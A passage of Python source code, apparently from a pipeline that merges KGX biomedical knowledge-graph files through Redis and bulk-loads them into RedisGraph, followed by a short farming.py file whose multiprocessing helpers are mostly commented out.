# Single quotes in array items break parsing of arrays on bulk loading
# downstream.
if isinstance(attribute, list):
new_attribute = []
for value in attribute:
if isinstance(value, str):
value = value.replace("'", '`')
new_attribute.append(value)
attribute = new_attribute
merged[keys] = attribute
return merged
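# Illustrative behavior of kgx_merge_dict (made-up values), given the conflict
# resolution used above (newly read record wins, single quotes in list items escaped):
#   kgx_merge_dict({"id": "X:1", "name": "a", "synonyms": ["it's"]},
#                  {"id": "X:1", "description": "d"})
#   -> {"id": "X:1", "name": "a", "description": "d", "synonyms": ["it`s"]}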
def sort_node_types(self, node_dict):
categories = node_dict.get('category')
if not categories:
return node_dict
leaf_type = self.biolink.get_leaf_class(categories)
# brings leaf class in the top
categories = [leaf_type] + [x for x in categories if x != leaf_type]
node_dict['category'] = categories
return node_dict
def merge_node_and_edges (self, nodes, edges, current_metric , data_set_name ):
read_time = current_metric['read_kgx_file_time']
total_time = current_metric['total_processing_time']
# prefix keys for fetching back and writing to file.
nodes = {f"node-{node['id']}": self.sort_node_types(node) for node in nodes}
edges = {f"edge-{edge['subject']}-{edge['object']}-{edge['predicate']}": edge for edge in
edges}
read_from_redis_time = time.time()
# read nodes and edges scoped to current file
nodes_in_redis = self.read_items_from_redis(list(nodes.keys()))
edges_in_redis = self.read_items_from_redis(list(edges.keys()))
read_from_redis_time = time.time() - read_from_redis_time
current_metric['read_redis_time'] = read_from_redis_time
merge_time = time.time()
log.info(f"Found matching {len(nodes_in_redis)} nodes {len(edges_in_redis)} edges from redis...")
for node_id in nodes_in_redis:
nodes[node_id] = self.kgx_merge_dict(nodes[node_id], nodes_in_redis[node_id])
for edge_id in edges_in_redis:
edges[edge_id] = self.kgx_merge_dict(edges[edge_id], edges_in_redis[edge_id])
# add predicate labels to edges;
for edge_id in edges:
edges[edge_id]['predicate_label'] = self.biolink.get_label(edges[edge_id]['predicate'])
merge_time = time.time() - merge_time
current_metric['merge_time'] = merge_time
write_to_redis_time = time.time()
self.write_items_to_redis(nodes)
self.write_items_to_redis(edges)
write_to_redis_time = time.time() - write_to_redis_time
current_metric['write_to_redis_time'] = write_to_redis_time
log.debug(
"path {:>45} read_file:{:>5} read_nodes_from_redis:{:>7} merge_time:{:>3} write_nodes_to_redis: {"
":>3}".format(
Util.trunc(data_set_name, 45), read_time, read_from_redis_time, merge_time, write_to_redis_time))
total_file_processing_time = time.time() - total_time
current_metric['total_processing_time'] = total_file_processing_time
current_metric['total_nodes_in_kgx_file'] = len(nodes)
current_metric['total_edges_in_kgx_file'] = len(edges)
current_metric['nodes_found_in_redis'] = len(nodes_in_redis)
current_metric['edges_found_in_redis'] = len(edges_in_redis)
log.info(f"processing {data_set_name} took {total_file_processing_time}")
return current_metric
def merge (self):
""" Merge nodes. Would be good to have something less computationally intensive. """
data_set_version = self.config.get('kgx', {}).get('dataset_version')
metrics = {}
start = time.time()
json_format_files = Util.kgx_objects("json")
jsonl_format_files = set([
x.replace(f'nodes_{data_set_version}.jsonl', '').replace(f'edges_{data_set_version}.jsonl', '') for x in Util.kgx_objects("jsonl")
])
log.info("Deleting any redis merge keys from previous run....")
self.delete_all_keys()
for file in json_format_files:
current_metric = {}
total_time = read_time = time.time()
current_kgx_data = Util.read_object(file)
read_time = time.time() - read_time
current_metric['read_kgx_file_time'] = read_time
current_metric['total_processing_time'] = total_time
self.merge_node_and_edges(nodes=current_kgx_data['nodes'],
edges=current_kgx_data['edges'],
current_metric=current_metric,
data_set_name=file)
for file in jsonl_format_files:
current_metric = {}
total_time = read_time = time.time()
edges = Util.json_line_iter(Util.kgx_path(file + f'edges_{data_set_version}.jsonl'))
nodes = Util.json_line_iter(Util.kgx_path(file + f'nodes_{data_set_version}.jsonl'))
read_time = time.time() - read_time
current_metric['read_kgx_file_time'] = read_time
current_metric['total_processing_time'] = total_time
self.merge_node_and_edges(nodes=nodes,
edges=edges,
current_metric=current_metric,
data_set_name=file)
log.info(f"total time for dumping to redis : {time.time() - start}")
# now we have all nodes and edges merged in redis we scan the whole redis back to disk
write_merge_metric = {}
t = time.time()
log.info("getting all nodes")
start_nodes_jsonl = time.time()
nodes_file_path = Util.merge_path("nodes.jsonl")
self.write_redis_back_to_jsonl(nodes_file_path, "node-*")
log.info(f"writing nodes to took : {time.time() - start_nodes_jsonl}")
write_merge_metric['nodes_writing_time'] = time.time() - start_nodes_jsonl
start_edge_jsonl = time.time()
log.info("getting all edges")
edge_output_file_path = Util.merge_path("edges.jsonl")
self.write_redis_back_to_jsonl(edge_output_file_path, "edge-*")
write_merge_metric['edges_writing_time'] = time.time() - start_edge_jsonl
log.info(f"writing edges took: {time.time() - start_edge_jsonl}")
write_merge_metric['total_time'] = time.time() - t
metrics['write_jsonl'] = write_merge_metric
metrics['total_time'] = time.time() - start
log.info(f"total took: {time.time() - start}")
if self.enable_metrics:
path = Util.metrics_path('merge_metrics.yaml')
Util.write_object(metrics, path)
class BiolinkModel:
root_type = 'biolink:NamedThing'
def __init__(self, bl_version='1.5.0'):
self.bl_url = f'https://raw.githubusercontent.com/biolink/biolink-model/{bl_version}/biolink-model.yaml'
self.toolkit = Toolkit(self.bl_url)
def find_biolink_leaves(self, biolink_concepts):
"""
Given a list of biolink concepts, returns the leaves removing any parent concepts.
:param biolink_concepts: list of biolink concepts
:return: leaf concepts.
"""
ancestry_set = set()
all_mixins_in_tree = set()
all_concepts = set(biolink_concepts)
# Keep track of things like "MacromolecularMachine" in current datasets
# @TODO remove this and make nodes as errors
unknown_elements = set()
for x in all_concepts:
current_element = self.toolkit.get_element(x)
mixins = set()
if current_element:
if 'mixins' in current_element and len(current_element['mixins']):
for m in current_element['mixins']:
mixins.add(self.toolkit.get_element(m).class_uri)
else:
unknown_elements.add(x)
ancestors = set(self.toolkit.get_ancestors(x, reflexive=False, formatted=True))
ancestry_set = ancestry_set.union(ancestors)
all_mixins_in_tree = all_mixins_in_tree.union(mixins)
leaf_set = all_concepts - ancestry_set - all_mixins_in_tree - unknown_elements
return leaf_set
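# For example, since biolink:Disease descends from biolink:NamedThing,
# find_biolink_leaves(["biolink:NamedThing", "biolink:Disease"]) would return
# {"biolink:Disease"}: the ancestor is in the ancestry set and is dropped.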
def get_leaf_class (self, names):
""" Return the leaf classes in the provided list of names. """
leaves = list(self.find_biolink_leaves(names))
return leaves[0]
def get_label(self, class_name):
element = self.toolkit.get_element(class_name)
if element:
name = element.name
return name
return class_name.replace("biolink:", "").replace("_", " ")
class BulkLoad:
""" Tools for creating a Redisgraph bulk load dataset. """
def __init__(self, biolink, config=None):
self.biolink = biolink
if not config:
config = get_config()
self.config = config
separator = self.config.get('bulk_loader',{}).get('separator', '|')
self.separator = chr(separator) if isinstance(separator, int) else separator
def tables_up_to_date (self):
return Util.is_up_to_date (
source=[
Util.schema_path (f"{SchemaType.PREDICATE.value}-schema.json"),
Util.schema_path (f"{SchemaType.PREDICATE.value}-schema.json")
] + Util.merged_objects (),
targets=glob.glob (Util.bulk_path ("nodes/**.csv")) + \
glob.glob (Util.bulk_path ("edges/**.csv")))
def create_nodes_csv_file(self):
if self.tables_up_to_date ():
log.info ("up to date.")
return
# clear out previous data
bulk_path = Util.bulk_path("nodes")
if os.path.exists(bulk_path):
shutil.rmtree(bulk_path)
categories_schema = Util.read_schema (SchemaType.CATEGORY)
state = defaultdict(lambda: None)
log.info(f"processing nodes")
""" Write node data for bulk load. """
categories = defaultdict(lambda: [])
category_error_nodes = set()
merged_nodes_file = Util.merge_path("nodes.jsonl")
counter = 1
for node in Util.json_line_iter(merged_nodes_file):
if not node['category']:
category_error_nodes.add(node['id'])
node['category'] = [BiolinkModel.root_type]
index = self.biolink.get_leaf_class(node['category'])
categories[index].append(node)
if len(category_error_nodes):
log.error(f"some nodes didn't have category assigned. KGX file has errors."
f"Nodes {len(category_error_nodes)}. They will be typed {BiolinkModel.root_type}"
f"Showing first 10: {list(category_error_nodes)[:10]}.")
# flush every 100K
if counter % 100_000 == 0:
self.write_bulk(Util.bulk_path("nodes"), categories, categories_schema,
state=state, is_relation=False)
# reset variables.
category_error_nodes = set()
categories = defaultdict(lambda: [])
counter += 1
# write back if any thing left.
if len(categories):
self.write_bulk(Util.bulk_path("nodes"), categories, categories_schema,
state=state, is_relation=False)
def create_edges_csv_file(self):
""" Write predicate data for bulk load. """
if self.tables_up_to_date ():
log.info ("up to date.")
return
# Clear out previous data
bulk_path = Util.bulk_path("edges")
if os.path.exists(bulk_path):
shutil.rmtree(bulk_path)
predicates_schema = Util.read_schema(SchemaType.PREDICATE)
predicates = defaultdict(lambda: [])
edges_file = Util.merge_path('edges.jsonl')
counter = 1
state = {}
for edge in Util.json_line_iter(edges_file):
predicates[edge['predicate']].append(edge)
# write out every 100K , to avoid large predicate dict.
if counter % 100_000 == 0:
self.write_bulk(Util.bulk_path("edges"), predicates, predicates_schema, state=state, is_relation=True)
predicates = defaultdict(lambda : [])
counter += 1
# if there are some items left (if loop ended before counter reached the specified value)
if len(predicates):
self.write_bulk(Util.bulk_path("edges"), predicates, predicates_schema, state=state, is_relation=True)
@staticmethod
def create_redis_schema_header(attributes: dict, is_relation=False):
"""
Creates col headers for csv to be used by redis bulk loader by assigning redis types
:param attributes: dictionary of data labels with values as python type strings
:param is_relation: True when generating headers for edge (relation) CSVs
:return: list of attributes where each item is attributeLabel:redisGraphDataType
"""
redis_type_conversion_map = {
'str': 'STRING',
'float': 'FLOAT', # Do we need to handle double
'int': 'INT',
'bool': 'BOOL',
'list': 'ARRAY'
}
col_headers = []
format_for_redis = lambda label, typ: f'{label}:{typ}'
for attribute, attribute_type in attributes.items():
col_headers.append(format_for_redis(attribute, redis_type_conversion_map[attribute_type]))
# Note: these two fields are only meaningful to the bulk loader;
# they will not become properties in the graph
# https://github.com/RedisGraph/redisgraph-bulk-loader/tree/master#input-schemas
if is_relation:
col_headers.append('internal_start_id:START_ID')
col_headers.append('internal_end_id:END_ID')
# replace id:STRING with id:ID
col_headers.append('id:ID')
col_headers = list(filter(lambda x: x != 'id:STRING', col_headers))
return col_headers
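# Illustrative example (attribute names are made up):
#   create_redis_schema_header({'id': 'str', 'name': 'str', 'publications': 'list'})
#   -> ['name:STRING', 'publications:ARRAY', 'id:ID']
# With is_relation=True, 'internal_start_id:START_ID' and 'internal_end_id:END_ID'
# are appended before 'id:ID'.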
@staticmethod
def group_items_by_attributes_set(objects: list, processed_object_ids: set):
"""
Groups items into a dictionary where the keys are sets of attributes set for all
items accessed in that key.
Eg. { set(id,name,category): [{id:'xx0',name:'bbb', 'category':['type']}....
{id:'xx1', name:'bb2', category: ['type1']}] }
:param objects: list of nodes or edges
:param processed_object_ids: ids of object to skip since they are processed.
:return: dictionary grouping based on set attributes
"""
clustered_by_set_values = {}
improper_keys = set()
value_set_test = lambda x: True if (x is not None and x != [] and x != '') else False
for obj in objects:
# the redis bulk loader requires column names without ':';
# until backtick escaping is supported we should avoid such keys.
key_filter = lambda k: ':' not in k
keys_with_values = frozenset([k for k in obj.keys() if value_set_test(obj[k]) and key_filter(k)])
for key in [k for k in obj.keys() if obj[k] and not key_filter(k)]:
improper_keys.add(key)
# Group by the set of attributes that actually have values. Why?
# The redis bulk loader has one limitation:
# imagine we have {'name': 'x'} and {'name': 'y', 'is_metabolite': true}
# sharing a common schema name:STRING,is_metabolite:BOOL.
# The rows would be `x,` and `y,true`; `x` having no value for is_metabolite is not
# handled well. The redis bulk loader expects a default value if we enforce the schema,
# but given the nature of the data, assigning defaults is not really an option.
# Hence grouping data into a separate csv per attribute set is the safer approach.
if obj['id'] not in processed_object_ids:
clustered_by_set_values[keys_with_values] = clustered_by_set_values.get(keys_with_values, [])
clustered_by_set_values[keys_with_values].append(obj)
return clustered_by_set_values, improper_keys
def write_bulk(self, bulk_path, obj_map, schema, state={}, is_relation=False):
""" Write a bulk load group of objects.
:param bulk_path: Path to the bulk loader object to write.
:param obj_map: A map of biolink type to list of objects.
:param schema: The schema (nodes or predicates) containing identifiers.
:param state: Track state of already written objects to avoid duplicates.
:param is_relation: True when writing edge (relation) CSVs. """
os.makedirs (bulk_path, exist_ok=True)
processed_objects_id = state.get('processed_id', set())
called_x_times = state.get('called_times', 0)
called_x_times += 1
for key, objects in obj_map.items ():
if len(objects) == 0:
continue
all_keys = schema[key]
""" Make all objects conform to the schema. """
clustered_by_set_values, improper_redis_keys = self.group_items_by_attributes_set(objects,
processed_objects_id)
if len(improper_redis_keys):
log.warning(f"The following keys were skipped since they include conflicting `:`"
f" that would cause errors while bulk loading to redis."
f"{improper_redis_keys}")
for index, set_attributes in enumerate(clustered_by_set_values.keys()):
items = clustered_by_set_values[set_attributes]
# The names of the part files written so far are collected here
state['file_paths'] = state.get('file_paths', {})
state['file_paths'][key] = state['file_paths'].get(key, {})
out_file = state['file_paths'][key][set_attributes] = state['file_paths']\
.get(key, {})\
.get(set_attributes, '')
# When calling write_bulk, say we have processed some
# chemicals from file 1 and we then start processing file 2:
# if we used just the index we might (rather, will) end up adding
# records to the wrong file, so the name needs to be as unique as possible.
# We achieve that by adding called_x_times; if we already found an out-file in
# the state object we are sure that the schemas match.
# biolink:<TYPE> is not a valid file name, so we need to replace ':'.
file_key = key.replace(':', '~')
out_file = f"{bulk_path}/{file_key}.csv-{index}-{called_x_times}" if not out_file else out_file
state['file_paths'][key][set_attributes] = out_file # store back file name
new_file = not os.path.exists(out_file)
keys_for_header = {x: all_keys[x] for x in all_keys if x in set_attributes}
redis_schema_header = self.create_redis_schema_header(keys_for_header, is_relation)
with open(out_file, "a", encoding='utf-8') as stream:
if new_file:
state['file_paths'][key][set_attributes] = out_file
log.info(f" --creating {out_file}")
stream.write(self.separator.join(redis_schema_header))
stream.write("\n")
else:
log.info(f" --appending to {out_file}")
""" Write fields, skipping duplicate objects. """
for obj in items:
oid = str(obj['id'])
if oid in processed_objects_id:
continue
processed_objects_id.add(oid)
""" Add ID / START_ID / END_ID depending"""
internal_id_fields = {
'internal_id': obj['id']
}
if is_relation:
internal_id_fields.update({
'internal_start_id': obj['subject'],
'internal_end_id': obj['object']
})
obj.update(internal_id_fields)
values = []
# uses redis schema header to preserve order when writing lines out.
for column_name in redis_schema_header:
# last key is the type
obj_key = ':'.join(column_name.split(':')[:-1])
value = obj[obj_key]
if obj_key not in internal_id_fields:
current_type = type(value).__name__
expected_type = all_keys[obj_key]
# cast it if it doesn't match type in schema keys i.e all_keys
value = TypeConversionUtil.cast(obj[obj_key], all_keys[obj_key]) \
if expected_type != current_type else value
# escape quotes .
values.append(str(value).replace("\"", "\\\""))
s = self.separator.join(values)
stream.write(s)
stream.write("\n")
state['processed_id'] = processed_objects_id
state['called_times'] = called_x_times
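# Rough shape of a generated part file (values and the file name are illustrative),
# assuming the default '|' separator, e.g. nodes/biolink~ChemicalSubstance.csv-0-1:
#   name:STRING|synonyms:ARRAY|id:ID
#   water|['aqua']|CHEBI:15377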
def insert (self):
redisgraph = self.config.redisgraph
nodes = sorted(glob.glob (Util.bulk_path ("nodes/**.csv*")))
edges = sorted(glob.glob (Util.bulk_path ("edges/**.csv*")))
graph = redisgraph['graph']
log.info(f"bulk loading \n nodes: {nodes} \n edges: {edges}")
try:
log.info (f"deleting graph {graph} in preparation for bulk load.")
db = self.get_redisgraph()
db.redis_graph.delete ()
except redis.exceptions.ResponseError:
log.info("no graph to delete")
log.info (f"bulk loading graph: {graph}")
args = []
if len(nodes) > 0:
bulk_path_root = Util.bulk_path('nodes') + os.path.sep
nodes_with_type = [ f"{ x.replace(bulk_path_root, '').split('.')[0].replace('~', ':')} {x}"
for x in nodes ]
args.extend(("-N " + " -N ".join(nodes_with_type)).split())
if len(edges) > 0:
bulk_path_root = Util.bulk_path('edges') + os.path.sep
edges_with_type = [ f"{x.replace(bulk_path_root, '').strip(os.path.sep).split('.')[0].replace('~', ':')} {x}"
for x in edges]
args.extend(("-R " + " -R ".join(edges_with_type)).split())
args.extend([f"--separator={self.separator}"])
args.extend([f"--host={redisgraph['host']}"])
args.extend([f"--port={redisgraph['port']}"])
args.extend([f"--password={redisgraph['password']}"])
args.extend(['--enforce-schema'])
args.extend([f"{redisgraph['graph']}"])
""" standalone_mode=False tells click not to sys.exit() """
log.debug(f"Calling bulk_insert with extended args: {args}")
try:
bulk_insert (args, standalone_mode=False)
except Exception as e:
log.error(f"Unexpected {e.__class__.__name__}: {e}")
raise
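# For reference, the args assembled above correspond roughly to a
# redisgraph-bulk-loader invocation of the shape (paths and names illustrative):
#   redisgraph-bulk-insert -N biolink:ChemicalSubstance <bulk>/nodes/biolink~ChemicalSubstance.csv-0-1 \
#       -R biolink:treats <bulk>/edges/biolink~treats.csv-0-1 \
#       --separator='|' --host=<host> --port=<port> --password=<password> \
#       --enforce-schema <graph-name>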
def get_redisgraph(self):
return RedisGraph(
host=self.config.redisgraph.host,
port=self.config.redisgraph.port,
password=self.config.redisgraph.password,
graph=self.config.redisgraph.graph,
)
def validate(self):
db = self.get_redisgraph()
validation_queries = config.get('validation', {}).get('queries', [])
for key, query in validation_queries.items ():
text = query['query']
name = query['name']
args = query.get('args', [{}])
for arg in args:
start = Util.current_time_in_millis ()
instance = Template (text).safe_substitute (arg)
db.query (instance)
duration = Util.current_time_in_millis () - start
log.info (f"Query {key}:{name} ran in {duration}ms: {instance}")
def wait_for_tranql(self):
retry_secs = 3
tranql_endpoint = self.config.indexing.tranql_endpoint
log.info(f"Contacting {tranql_endpoint}")
graph_name = self.config["redisgraph"]["graph"]
test_query = "SELECT disease-> phenotypic_feature " \
f"FROM 'redis:{graph_name}'" \
f"WHERE disease='MONDO:0004979'"
is_done_loading = False
try:
while not is_done_loading:
response = requests.post(tranql_endpoint, data=test_query)
response_code = response.status_code
response = response.json()
is_done_loading = "message" in response and response_code == 200
if is_done_loading:
break
else:
log.info(f"Tranql responsed with response: {response}")
log.info(f"Retrying in {retry_secs} secs...")
time.sleep(retry_secs)
except ConnectionError as e:
# convert exception to be more readable.
raise ConnectionError(f"Attempting to contact {tranql_endpoint} failed due to connection error. "
f"Please check status of Tranql server.")
class Roger:
""" Consolidate Roger functionality for a cleaner interface. """
def __init__(self, to_string=False, config=None):
""" Initialize.
:param to_string: Log messages to a string, available as self.log_stream.getvalue()
after execution completes.
"""
import logging
self.has_string_handler = to_string
if not config:
config = get_config()
self.config = config
if to_string:
""" Add a stream handler to enable to_string. """
self.log_stream = StringIO()
self.string_handler = logging.StreamHandler (self.log_stream)
log.addHandler (self.string_handler)
self.biolink = BiolinkModel (config.kgx.biolink_model_version)
self.kgx = KGXModel (self.biolink, config=config)
self.bulk = BulkLoad (self.biolink, config=config)
def __enter__(self):
""" Implement Python's Context Manager interface. """
return self
def __exit__(self, exception_type, exception_value, traceback):
""" Implement Python's Context Manager interface. We use this finalizer
to detach the stream handler appended in the constructor.
:param exception_type: Type of exception, if one occurred.
:param exception_value: The exception, if one occurred.
:param traceback: The stack trace explaining the exception.
"""
if exception_type or exception_value or traceback:
log.error (msg="Error:", exc_info=(exception_type, exception_value, traceback))
if self.has_string_handler:
log.removeHandler (self.string_handler)
class RogerUtil:
""" An interface abstracting Roger's inner workings to make it easier to
incorporate into external tools like workflow engines. """
@staticmethod
def get_kgx (to_string=False, config=None):
output = None
log.debug("Getting KGX method called.")
with Roger (to_string, config=config) as roger:
dataset_version = roger.config.get('kgx', {}).get('dataset_version')
roger.kgx.get (dataset_version=dataset_version)
output = roger.log_stream.getvalue () if to_string else None
return output
@staticmethod
def create_schema (to_string=False, config=None):
o1 = RogerUtil.create_nodes_schema(to_string=to_string, config=config)
o2 = RogerUtil.create_edges_schema(to_string=to_string, config=config)
output = (o1 + o2 ) if to_string else None
return output
@staticmethod
def create_edges_schema(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.kgx.create_edges_schema()
output = roger.log_stream.getvalue() if to_string else None
return output
@staticmethod
def create_nodes_schema(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.kgx.create_nodes_schema()
output = roger.log_stream.getvalue() if to_string else None
return output
@staticmethod
def merge_nodes (to_string=False, config=None):
output = None
with Roger (to_string, config=config) as roger:
roger.kgx.merge ()
output = roger.log_stream.getvalue () if to_string else None
return output
@staticmethod
def create_bulk_load (to_string=False, config=None):
o1 = RogerUtil.create_bulk_nodes(to_string=to_string, config=config)
o2 = RogerUtil.create_bulk_edges(to_string=to_string, config=config)
output = (o1 + o2) if to_string else None
return output
@staticmethod
def create_bulk_nodes(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.bulk.create_nodes_csv_file()
output = roger.log_stream.getvalue() if to_string else None
return output
@staticmethod
def create_bulk_edges(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.bulk.create_edges_csv_file()
output = roger.log_stream.getvalue() if to_string else None
return output
@staticmethod
def bulk_load (to_string=False, config=None):
output = None
with Roger (to_string, config=config) as roger:
roger.bulk.insert ()
output = roger.log_stream.getvalue () if to_string else None
return output
@staticmethod
def validate (to_string=False, config=None):
output = None
with Roger (to_string, config=config) as roger:
roger.bulk.validate ()
output = roger.log_stream.getvalue () if to_string else None
return output
@staticmethod
def check_tranql(to_string=False, config=None):
output = None
with Roger(to_string, config=config) as roger:
roger.bulk.wait_for_tranql()
output = roger.log_stream.getvalue() if to_string else None
return output
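# A typical pipeline built on RogerUtil would invoke these steps in order
# (sketch; orchestration details such as the workflow engine are out of scope here):
#   RogerUtil.get_kgx()          # download KGX files
#   RogerUtil.merge_nodes()      # merge duplicate nodes/edges via redis
#   RogerUtil.create_schema()    # infer node/edge schemas from the merged jsonl
#   RogerUtil.create_bulk_load() # write bulk-loader CSVs
#   RogerUtil.bulk_load()        # insert into redisgraph
#   RogerUtil.validate()         # run validation queries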
if __name__ == "__main__":
""" Roger CLI. """
parser = argparse.ArgumentParser(description='Roger')
parser.add_argument('-v', '--dataset-version', help="Dataset version.", default="v1.0")
parser.add_argument('-d', '--data-root', help="Root of data hierarchy", default=None)
parser.add_argument('-g', '--get-kgx', help="Get KGX objects", action='store_true')
parser.add_argument('-l', '--load-kgx', help="Load via KGX", action='store_true')
parser.add_argument('-s', '--create-schema', help="Infer schema", action='store_true')
parser.add_argument('-m', '--merge-kgx', help="Merge KGX nodes", action='store_true')
parser.add_argument('-b', '--create-bulk', help="Create bulk load", action='store_true')
parser.add_argument('-i', '--insert', help="Do the bulk insert", action='store_true')
parser.add_argument('-a', '--validate', help="Validate the insert", action='store_true')
args = parser.parse_args ()
biolink = BiolinkModel ()
kgx = KGXModel (biolink)
bulk = BulkLoad (biolink)
if args.data_root is not None:
config = get_config()
data_root = args.data_root
config.update({'data_root': data_root})
log.info (f"data root:{data_root}")
if args.get_kgx:
kgx.get (dataset_version=args.dataset_version)
if args.load_kgx:
kgx.load ()
if args.merge_kgx:
kgx.merge ()
if args.create_schema:
kgx.create_schema ()
if args.create_bulk:
bulk.create_nodes_csv_file ()
bulk.create_edges_csv_file ()
if args.insert:
bulk.insert ()
if args.validate:
bulk.validate ()
sys.exit (0)
|
farming.py
|
from humpack.farming import Farmer, make_ghost, Replicator, Parallelizer, replicate, Cloner
# import sys, os
# import torch
# import numpy as np
# import torch.multiprocessing as mp
# import itertools
# import traceback
# class ExceptionWrapper(object):
# r"""Wraps an exception plus traceback to communicate across threads"""
# def __init__(self, exc_info):
# # It is important that we don't store exc_info, see
# # NOTE [ Python Traceback Reference Cycle Problem ]
# self.exc_type = exc_info[0]
# self.exc_msg = "".join(traceback.format_exception(*exc_info))
#
# def _worker_loop(fn, private_args, in_queue, out_queue, unique_args={}, init_fn=None):
# torch.set_num_threads(1)
#
# output_args = None
# if init_fn is not None:
# args = private_args.copy()
# args.update(unique_args)
# try:
# output_args = init_fn(**args)
# except Exception:
# print('failed')
# out_queue.put(ExceptionWrapper(sys.exc_info()))
# return
#
# while True:
# all_args = private_args.copy()
# all_args.update(unique_args)
# if output_args is not None:
# all_args.update(output_args)
#
# args = in_queue.get()
# if args is None:
# break
# try:
# shared_args, volatile_args = args
# all_args.update(shared_args)
# all_args.update(volatile_args)
# output = fn(**all_args)
# except Exception:
# out_queue.put(ExceptionWrapper(sys.exc_info()))
# else:
# out_queue.put(output)
#
# class Farmer(object):
# '''
# Farms computation (of functions with both private and shared args) to other processes
# 4 types of arguments (all of which are dicts):
# - shared_args = arguments to be sent to workers when dispatched from master process
# - private_args = arguments that all workers own privately (eg. data you dont want to pass in each dispatch)
# - unique_worker_args = arguments that each worker owns privately (eg. random seeds)
# - volatile_args = arguments generated and sent for each dispatch
#
# '''
# def __init__(self, fn, shared_args={}, private_args={}, unique_worker_args=None, volatile_gen=None,
# init_fn=None, num_workers=0, timeout=20, waiting=None, auto_dispatch=True):
# '''
#
# :param fn:
# :param shared_args:
# :param private_args:
# :param unique_worker_args:
# :param volatile_gen:
# :param init_fn:
# :param num_workers:
# :param timeout:
# :param waiting:
# :param auto_dispatch:
# '''
#
# if unique_worker_args is not None:
# try:
# num_workers = len(unique_worker_args)
# except TypeError:
# pass
#
# self.num_workers = num_workers
# self.shared_args = shared_args
# self.volatile_gen = volatile_gen
# self.timeout = timeout
# self.workers = None
#
# self.in_queue = mp.Queue()
# self.outstanding = 0
# self.auto_dispatch = auto_dispatch
#
# self.dispatch_num = 1
#
# if num_workers > 0:
# if unique_worker_args is not None: # list of dicts
# assert len(unique_worker_args) == num_workers
# else:
# unique_worker_args = [{}] * num_workers
#
# self.out_queue = mp.Queue()
# self.workers = [
# mp.Process(target=_worker_loop, args=(fn, private_args, self.in_queue, self.out_queue, u, init_fn))
# for i, u in enumerate(unique_worker_args)]
#
# for w in self.workers:
# w.daemon = True # ensure that the worker exits on process exit
# w.start()
#
# if waiting is None:
# waiting = num_workers if auto_dispatch else 0
# self._dispatch(waiting)
#
# else:
# self.fn = fn
# self.args = private_args.copy()
# if init_fn is not None:
# output_args = init_fn(**private_args)
# if output_args is not None:
# self.args.update(output_args)
#
# def _get_volatile_args(self):
# if self.volatile_gen is not None:
# return next(self.volatile_gen)
# return {}
#
# def _dispatch(self, n=1, args=None):
# if args is None:
# args = self.shared_args
# for _ in range(n):
# try:
# self.in_queue.put((args, self._get_volatile_args()))
# self.outstanding += 1
# except StopIteration:
# pass
#
# def dispatch(self, **kwargs):
# self._dispatch(self.dispatch_num, args=kwargs.update(self.shared_args))
#
# def __len__(self):
# return self.outstanding
#
# def __iter__(self):
# return self
#
# def __next__(self):
# if self.auto_dispatch:
# self._dispatch()
# if self.outstanding == 0:
# raise StopIteration
# if self.workers is None: # apply fn in this process
# args = self.args.copy()
# shared_args, volatile_args = self.in_queue.get()
# self.outstanding -= 1
# args.update(shared_args)
# args.update(volatile_args)
# return self.fn(**args)
# output = self.out_queue.get(timeout=self.timeout)
# self.outstanding -= 1
# if isinstance(output, ExceptionWrapper):
# try:
# raise output.exc_type(output.exc_msg)
# except:
# print('***ERROR: Exception of type {} occurred'.format(output.exc_type))
# raise Exception(output.exc_msg)
# #quit()
# return output
#
# def __del__(self):
# if self.workers is not None:
# for _ in self.workers:
# self.in_queue.put(None)
#
#
# def make_ghost(source, execute=None):
# '''
# upon anything done to a ghost instance it will check the 'source' for the correct behavior
# and will call 'execute' with the function and args
#
# :param execute: should be callable with signature: execute(fn, args=[], kwargs={})
# :param source: class which contains the functionality
# :return: Ghost object which can be used to execute functions from 'source' in 'parent'
# '''
#
# if execute is None:
# def execute(fn, args=[], kwargs={}):
# return fn(*args, **kwargs)
#
# def make_listener(fn):
# def listener(*args, **kwargs):
# return execute(fn, args, kwargs)
# return listener
#
# class Ghost(object):
# def __getattr__(ignore, item):
# #print('rpl', item)
# if hasattr(source, item): # any method in obj_type
# return make_listener(getattr(source, item))
#
# return execute(getattr, args=[item])
#
# # NOTE: use r.__len__()
# #def __len__(ignore):
# # raise Exception('Python error: len(r) doesn\'t work on replicas, use r.__len__() instead')
#
# def __setattr__(self, key, value):
# execute(getattr(source, '__setattr__'), args=[key, value])
#
# def __delattr__(self, item):
# execute(getattr(source, '__delattr__'), args=[item])
#
# def __getitem__(ignore, item):
# return execute(getattr(source, '__getitem__'), args=[item])
#
# def __iter__(self):
# return itertools.zip_longest(*execute(getattr(source, '__iter__')))
#
# def __add__(ignore, other):
# return execute(getattr(source, '__add__'), args=[other])
#
# return Ghost()
#
#
# # Init fn for any replica (used by Replicator, Parallelizer, and Cloner) - creates instance of replicated object
# def _replica_init(obj_type, init_args, init_kwargs, unique_init_kwargs={}):
# init_kwargs.update(unique_init_kwargs)
# return {'obj': obj_type(*init_args, **init_kwargs)}
#
# # Run fn for any replica (used by Replicator, Parallelizer, and Cloner) - applies function to be executed to instance
# def _replica_run(obj, fn, args, kwargs, **other_args):
# try:
# return fn(obj, *args, **kwargs)
# except Exception as e:
# return e
#
# class Replicator(object): # see 'replicate' function below
# def __init__(self, obj_type, replicas=None, unique_init_kwargs=None, init_args=[], init_kwargs={},
# timeout=20, collate=True):
#
# assert replicas is not None or unique_init_kwargs is not None, 'not sure how many replicas to make'
# if replicas is None:
# replicas = len(unique_init_kwargs)
# self.replicas = replicas
#
# replica_init_args = {
# 'obj_type': obj_type,
# 'init_args': init_args,
# 'init_kwargs': init_kwargs,
# }
#
# if replicas > 0:
# if unique_init_kwargs is not None: # list of dicts
# assert len(unique_init_kwargs) == replicas
# else:
# unique_init_kwargs = [{}] * replicas
#
# self.in_queues = np.array([mp.Queue() for _ in range(replicas)])
# self.out_queues = np.array([mp.Queue() for _ in range(replicas)])
# self.workers = [
# mp.Process(target=_worker_loop, args=(
# _replica_run, replica_init_args, in_q, out_q, {'unique_init_kwargs': unique}, _replica_init))
# for i, (unique, in_q, out_q) in enumerate(zip(unique_init_kwargs, self.in_queues, self.out_queues))]
#
# for w in self.workers:
# w.daemon = True # ensure that the worker exits on process exit
# w.start()
#
# else: # creates an invisible wrapper
